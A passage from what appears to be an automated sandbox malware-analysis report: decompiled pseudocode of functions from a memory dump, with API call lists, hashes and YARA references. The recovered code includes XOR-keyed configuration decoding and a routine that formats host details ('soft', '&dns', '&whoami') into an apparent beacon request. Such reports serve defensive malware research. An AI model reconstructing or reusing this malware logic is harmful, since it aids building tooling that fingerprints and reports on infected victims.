				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E02BD75F6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E02BD4AAB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E02BD75F6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x2bdd2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x02bd78ed
0x02bd78f4
0x02bd78f9
0x02bd78fc
0x02bd7903
0x02bd7906
0x02bd7909
0x02bd790e
0x02bd7913
0x02bd7a67
0x02bd7a69
0x02bd7a6b
0x02bd7a70
0x02bd7a70
0x02bd7919
0x02bd791c
0x02bd791f
0x02bd7921
0x02bd7921
0x02bd7925
0x00000000
0x00000000
0x02bd7929
0x02bd7955
0x02bd795a
0x02bd795c
0x02bd795c
0x02bd795f
0x02bd7962
0x02bd7962
0x02bd7964
0x00000000
0x02bd792f
0x02bd7931
0x02bd7950
0x02bd7950
0x02bd7967
0x02bd7967
0x02bd7968
0x02bd7968
0x02bd796b
0x00000000
0x00000000
0x00000000
0x02bd796b
0x02bd7935
0x02bd797c
0x02bd7980
0x02bd7a5a
0x02bd7a5c
0x02bd7a5c
0x02bd7a5d
0x02bd7a60
0x00000000
0x02bd7a60
0x02bd7989
0x02bd799a
0x02bd799e
0x02bd7a56
0x00000000
0x02bd7a56
0x02bd79a4
0x02bd79a7
0x02bd79ab
0x02bd79af
0x02bd79b4
0x02bd7a4c
0x02bd7a4c
0x00000000
0x02bd7a52
0x02bd79bf
0x02bd79c8
0x02bd79dc
0x02bd79e3
0x02bd79f8
0x02bd79fe
0x02bd7a06
0x00000000
0x00000000
0x00000000
0x00000000
0x02bd7a08
0x02bd7a08
0x02bd7a08
0x02bd7a0f
0x02bd7a17
0x00000000
0x00000000
0x02bd7a19
0x02bd7a22
0x00000000
0x00000000
0x00000000
0x02bd7a24
0x02bd7a26
0x02bd7a29
0x02bd7a29
0x02bd7a2c
0x02bd7a30
0x02bd7a33
0x02bd7a39
0x02bd7a3c
0x02bd7a43
0x00000000
0x02bd79bf
0x02bd793a
0x02bd7942
0x02bd7948
0x02bd794a
0x02bd794a
0x02bd794d
0x02bd794f
0x00000000
0x02bd794f
0x02bd7929
0x02bd796f
0x02bd7974
0x02bd7976
0x02bd7976
0x02bd7979
0x02bd7979
0x00000000

APIs

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

lstrcpy.KERNEL32(69B25F45,00000020), ref: 02BD79E3
lstrcat.KERNEL32(69B25F45,00000020), ref: 02BD79F8
lstrcmp.KERNEL32(00000000,69B25F45), ref: 02BD7A0F
lstrlen.KERNEL32(69B25F45), ref: 02BD7A33

Strings

, xrefs: 02BD797C

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 0714b875ffc66216a2eccfdf487fc7b7aaf6844cd5a6aaa4579fa9867fb118c3
Instruction ID: 109ebdb3d54235fa46d14520bd1fd11d2dbd20fdc1795353114748aec88458e3
Opcode Fuzzy Hash: 0714b875ffc66216a2eccfdf487fc7b7aaf6844cd5a6aaa4579fa9867fb118c3
Instruction Fuzzy Hash: 2A51C032A00119EBCF11DF99C984BEDFBB6FF45358F15809AE924AB201EB349B11DB40

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5141, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E02BD5141(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E02BD75F6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x2bdc2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x02bd5145
0x02bd5152
0x02bd5154
0x02bd5155
0x02bd515d
0x02bd515d
0x02bd5161
0x00000000
0x00000000
0x02bd5158
0x02bd5159
0x02bd515c
0x02bd515c
0x02bd5169
0x02bd516e
0x02bd5173
0x02bd517b
0x02bd5181
0x02bd5183
0x02bd5186
0x02bd518a
0x02bd518c
0x02bd518f
0x02bd518f
0x02bd5190
0x02bd5192
0x02bd518f
0x02bd519c
0x02bd519f
0x02bd51a2
0x02bd51a3
0x02bd51a5
0x02bd51ac
0x02bd51ac
0x02bd51b8

APIs

StrChrA.SHLWAPI(?,00000020,00000000,067495AC,02BD5390,?,02BD935C,?,067495AC,?,02BD5390), ref: 02BD515D
StrTrimA.KERNELBASE(?,02BDC2A4,00000002,?,02BD935C,?,067495AC,?,02BD5390), ref: 02BD517B
StrChrA.SHLWAPI(?,00000020,?,02BD935C,?,067495AC,?,02BD5390), ref: 02BD5186

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 5cd822fd649b5a7ad65456bacb6e7829bfc497ba06ea43a9b2d5aa231ad66caf
Instruction ID: e806990d55b063fc3e5678f9a2dbfb67b6e0e841006e12eea22f145c2aba39d6
Opcode Fuzzy Hash: 5cd822fd649b5a7ad65456bacb6e7829bfc497ba06ea43a9b2d5aa231ad66caf
Instruction Fuzzy Hash: DB01B1317013467FE7304A2A8C54FE77F9DEB86784F840091B995CB282FA70C881C760

Uniqueness

Uniqueness Score: -1.00%

Function 02BD18D8, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x2bdd274) == 0) {
						E02BD4450();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x2bdd274) == 1) {
						_t10 = E02BD262F(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x02bd18df
0x02bd18e0
0x02bd18e3
0x02bd1915
0x02bd1917
0x02bd1917
0x02bd18e5
0x02bd18e6
0x02bd18fb
0x02bd1902
0x02bd1904
0x02bd1904
0x02bd1902
0x02bd18e6
0x02bd191f

APIs

InterlockedIncrement.KERNEL32(02BDD274), ref: 02BD18ED

Part of subcall function 02BD262F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02BD1900,?), ref: 02BD2642

InterlockedDecrement.KERNEL32(02BDD274), ref: 02BD190D

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: ad2d592ae60ad9dc1e1c44eaa141f4b5035da2e1edc04eab4e617293db897d11
Instruction ID: b908d4413e2429c99b2a43275646759880109034a54cbca045a047887aa5ad45
Opcode Fuzzy Hash: ad2d592ae60ad9dc1e1c44eaa141f4b5035da2e1edc04eab4e617293db897d11
Instruction Fuzzy Hash: 20E04F3A794222A79B312A78A8047DBAE54EB10784F4145A5B6C9D2069F724C9D3CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02BD4C40, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E02BD4C40(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x2bdd2dc; // 0x69b25f44
				if(E02BD5657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x2bdd310 = _v8;
				}
				_t33 =  *0x2bdd2dc; // 0x69b25f44
				if(E02BD5657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x2bdd2dc; // 0x69b25f44
				if(E02BD5657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x2bdd270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x2bdd2dc; // 0x69b25f44
						_t45 = E02BD3BB8(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2bdd278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x2bdd2dc; // 0x69b25f44
						_t46 = E02BD3BB8(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2bdd27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x2bdd2dc; // 0x69b25f44
						_t47 = E02BD3BB8(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x2bdd280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x2bdd2dc; // 0x69b25f44
						_t48 = E02BD3BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x2bdd004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x2bdd2dc; // 0x69b25f44
						_t49 = E02BD3BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x2bdd02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x2bdd2dc; // 0x69b25f44
						_t50 = E02BD3BB8(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x2bdd284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x2bdd2dc; // 0x69b25f44
								_t51 = E02BD3BB8(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E02BD49B8(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E02BD4B98();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x2bdd2dc; // 0x69b25f44
								_t52 = E02BD3BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E02BD49B8(0, _t52) != 0) {
								_t121 =  *0x2bdd364; // 0x67495b0
								E02BD9311(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x2bdd2dc; // 0x69b25f44
								_t53 = E02BD3BB8(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x2bdd2e0; // 0x3b6a5a8
								_t22 = _t54 + 0x2bde252; // 0x616d692f
								 *0x2bdd30c = _t22;
								goto L60;
							} else {
								_t64 = E02BD49B8(0, _t53);
								 *0x2bdd30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x2bdd2dc; // 0x69b25f44
										_t56 = E02BD3BB8(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x2bdd2e0; // 0x3b6a5a8
										_t23 = _t57 + 0x2bde79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E02BD49B8(0, _t56);
									}
									 *0x2bdd380 = _t58;
									HeapFree( *0x2bdd270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x02bd4c40
0x02bd4c43
0x02bd4c63
0x02bd4c71
0x02bd4c71
0x02bd4c76
0x02bd4c90
0x02bd4ef8
0x02bd4eff
0x02bd4f06
0x02bd4f06
0x02bd4c96
0x02bd4cb2
0x02bd4ee6
0x02bd4ef0
0x00000000
0x02bd4cb8
0x02bd4cb8
0x02bd4cbd
0x02bd4cd3
0x02bd4cbf
0x02bd4cbf
0x02bd4ccc
0x02bd4ccc
0x02bd4cdd
0x02bd4cdf
0x02bd4ce9
0x02bd4cee
0x02bd4cee
0x02bd4ce9
0x02bd4cf5
0x02bd4d0b
0x02bd4cf7
0x02bd4cf7
0x02bd4d04
0x02bd4d04
0x02bd4d0f
0x02bd4d11
0x02bd4d1b
0x02bd4d20
0x02bd4d20
0x02bd4d1b
0x02bd4d27
0x02bd4d3d
0x02bd4d29
0x02bd4d29
0x02bd4d36
0x02bd4d36
0x02bd4d41
0x02bd4d43
0x02bd4d4d
0x02bd4d52
0x02bd4d52
0x02bd4d4d
0x02bd4d59
0x02bd4d6f
0x02bd4d5b
0x02bd4d5b
0x02bd4d68
0x02bd4d68
0x02bd4d73
0x02bd4d75
0x02bd4d7f
0x02bd4d84
0x02bd4d84
0x02bd4d7f
0x02bd4d8b
0x02bd4da1
0x02bd4d8d
0x02bd4d8d
0x02bd4d9a
0x02bd4d9a
0x02bd4da5
0x02bd4da7
0x02bd4db1
0x02bd4db6
0x02bd4db6
0x02bd4db1
0x02bd4dbd
0x02bd4dd3
0x02bd4dbf
0x02bd4dbf
0x02bd4dcc
0x02bd4dcc
0x02bd4dd7
0x02bd4dea
0x02bd4dea
0x00000000
0x02bd4dd9
0x02bd4dd9
0x02bd4de3
0x00000000
0x02bd4df4
0x02bd4df4
0x02bd4df6
0x02bd4e0c
0x02bd4df8
0x02bd4df8
0x02bd4e05
0x02bd4e05
0x02bd4e10
0x02bd4e12
0x02bd4e15
0x02bd4e16
0x02bd4e1d
0x02bd4e1f
0x02bd4e20
0x02bd4e20
0x02bd4e1d
0x02bd4e27
0x02bd4e3d
0x02bd4e29
0x02bd4e29
0x02bd4e36
0x02bd4e36
0x02bd4e41
0x02bd4e4f
0x02bd4e59
0x02bd4e59
0x02bd4e60
0x02bd4e76
0x02bd4e62
0x02bd4e62
0x02bd4e6f
0x02bd4e6f
0x02bd4e7a
0x02bd4e8d
0x02bd4e8d
0x02bd4e92
0x02bd4e98
0x00000000
0x02bd4e7c
0x02bd4e7f
0x02bd4e84
0x02bd4e8b
0x02bd4e9d
0x02bd4e9f
0x02bd4eb5
0x02bd4ea1
0x02bd4ea1
0x02bd4eae
0x02bd4eae
0x02bd4eb9
0x02bd4ec5
0x02bd4eca
0x02bd4eca
0x02bd4ebb
0x02bd4ebe
0x02bd4ebe
0x02bd4ed8
0x02bd4edd
0x02bd4ee3
0x00000000
0x02bd4ee3
0x00000000
0x02bd4e8b
0x02bd4e7a
0x02bd4de3
0x02bd4dd7

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,02BD5390,?,69B25F44,?,02BD5390,69B25F44,?,02BD5390,69B25F44,00000005,02BDD00C,00000008), ref: 02BD4CE5
StrToIntExA.SHLWAPI(00000000,00000000,?,02BD5390,?,69B25F44,?,02BD5390,69B25F44,?,02BD5390,69B25F44,00000005,02BDD00C,00000008), ref: 02BD4D17
StrToIntExA.SHLWAPI(00000000,00000000,?,02BD5390,?,69B25F44,?,02BD5390,69B25F44,?,02BD5390,69B25F44,00000005,02BDD00C,00000008), ref: 02BD4D49
StrToIntExA.SHLWAPI(00000000,00000000,?,02BD5390,?,69B25F44,?,02BD5390,69B25F44,?,02BD5390,69B25F44,00000005,02BDD00C,00000008), ref: 02BD4D7B
StrToIntExA.SHLWAPI(00000000,00000000,?,02BD5390,?,69B25F44,?,02BD5390,69B25F44,?,02BD5390,69B25F44,00000005,02BDD00C,00000008), ref: 02BD4DAD
StrToIntExA.SHLWAPI(00000000,00000000,?,02BD5390,?,69B25F44,?,02BD5390,69B25F44,?,02BD5390,69B25F44,00000005,02BDD00C,00000008), ref: 02BD4DDF
HeapFree.KERNEL32(00000000,02BD5390,02BD5390,?,69B25F44,?,02BD5390,69B25F44,?,02BD5390,69B25F44,00000005,02BDD00C,00000008,?,02BD5390), ref: 02BD4EDD
HeapFree.KERNEL32(00000000,?,02BD5390,?,69B25F44,?,02BD5390,69B25F44,?,02BD5390,69B25F44,00000005,02BDD00C,00000008,?,02BD5390), ref: 02BD4EF0

Part of subcall function 02BD49B8: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,02BD5390,02BD4EC3,00000000,02BD5390,?,69B25F44,?,02BD5390,69B25F44,?,02BD5390,69B25F44,00000005), ref: 02BD49C1
Part of subcall function 02BD49B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,02BD5390), ref: 02BD49E4
Part of subcall function 02BD49B8: memset.NTDLL ref: 02BD49F3

Strings

Ut, xrefs: 02BD4EDD, 02BD4EF0

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$lstrlenmemcpymemset
String ID: Ut
API String ID: 3442150357-8415677
Opcode ID: 835eac11e0d84eeead1e6decf4d80228bc2b9feee7386cba1c9a0d6d70609c4a
Instruction ID: 056571112d42aa0e54da8ad569f1e80c1f28e1233c289d3c3071dc6848218f32
Opcode Fuzzy Hash: 835eac11e0d84eeead1e6decf4d80228bc2b9feee7386cba1c9a0d6d70609c4a
Instruction Fuzzy Hash: E9819E71A41645BFCB20EBB8CE98DEB77FAEB48244B284DE5A045D7204FB35D9448F60

Uniqueness

Uniqueness Score: -1.00%

Function 02BD44A4, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E02BD44A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x2bdd018; // 0x6a85f48
				asm("bswap eax");
				_t27 =  *0x2bdd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x2bdd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x2bdd00c; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x2bdd2e0; // 0x3b6a5a8
				_t3 = _t30 + 0x2bde633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0x2bdd02c,  *0x2bdd004, _t25);
				_t33 = E02BD5B60();
				_t34 =  *0x2bdd2e0; // 0x3b6a5a8
				_t4 = _t34 + 0x2bde673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E02BD1BBF(_t91);
				if(_t96 != 0) {
					_t83 =  *0x2bdd2e0; // 0x3b6a5a8
					_t6 = _t83 + 0x2bde8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x2bdd270, 0, _t96);
				}
				_t97 = E02BD137A();
				if(_t97 != 0) {
					_t78 =  *0x2bdd2e0; // 0x3b6a5a8
					_t8 = _t78 + 0x2bde8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x2bdd270, 0, _t97);
				}
				_t98 =  *0x2bdd364; // 0x67495b0
				_a32 = E02BD3857(0x2bdd00a, _t98 + 4);
				_t42 =  *0x2bdd308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x2bdd2e0; // 0x3b6a5a8
					_t11 = _t74 + 0x2bde8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x2bdd304; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x2bdd2e0; // 0x3b6a5a8
					_t13 = _t71 + 0x2bde885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x2bdd270, 0, 0x800);
					if(_t100 != 0) {
						E02BDA811(GetTickCount());
						_t50 =  *0x2bdd364; // 0x67495b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x2bdd364; // 0x67495b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x2bdd364; // 0x67495b0
						_t103 = E02BD1974(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x2bdc2ac);
							_push(_t103);
							_t62 = E02BD38CA();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E02BD2A4E(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E02BD47D5();
								}
								HeapFree( *0x2bdd270, 0, _v44);
							}
							HeapFree( *0x2bdd270, 0, _t103);
						}
						HeapFree( *0x2bdd270, 0, _t100);
					}
					HeapFree( *0x2bdd270, 0, _a24);
				}
				HeapFree( *0x2bdd270, 0, _t105);
				return _a12;
			}

0x02bd44a4
0x02bd44a4
0x02bd44a4
0x02bd44a9
0x02bd44af
0x02bd44b9
0x02bd44bb
0x02bd44bb
0x02bd44c8
0x02bd44d3
0x02bd44d6
0x02bd44e1
0x02bd44e4
0x02bd44e9
0x02bd44ec
0x02bd44f1
0x02bd44f4
0x02bd4500
0x02bd450d
0x02bd450f
0x02bd4515
0x02bd451a
0x02bd4525
0x02bd4527
0x02bd452a
0x02bd4531
0x02bd4535
0x02bd4537
0x02bd453c
0x02bd4548
0x02bd454a
0x02bd4556
0x02bd4558
0x02bd4558
0x02bd4563
0x02bd4567
0x02bd4569
0x02bd456e
0x02bd457a
0x02bd457c
0x02bd4588
0x02bd458a
0x02bd458a
0x02bd4590
0x02bd45a3
0x02bd45a7
0x02bd45ae
0x02bd45b1
0x02bd45b6
0x02bd45c1
0x02bd45c3
0x02bd45c6
0x02bd45c6
0x02bd45c8
0x02bd45cf
0x02bd45d2
0x02bd45d7
0x02bd45e1
0x02bd45e3
0x02bd45eb
0x02bd4604
0x02bd4608
0x02bd4614
0x02bd4619
0x02bd4622
0x02bd4633
0x02bd4637
0x02bd4640
0x02bd4646
0x02bd4653
0x02bd4660
0x02bd4666
0x02bd4672
0x02bd4678
0x02bd4679
0x02bd467e
0x02bd4684
0x02bd468a
0x02bd4691
0x02bd4698
0x02bd469e
0x02bd46a5
0x02bd46a9
0x02bd46b4
0x02bd46b9
0x02bd46bf
0x02bd46c8
0x02bd46c8
0x02bd46d9
0x02bd46d9
0x02bd46e8
0x02bd46e8
0x02bd46f7
0x02bd46f7
0x02bd4709
0x02bd4709
0x02bd4718
0x02bd4729

APIs

GetTickCount.KERNEL32 ref: 02BD44BB
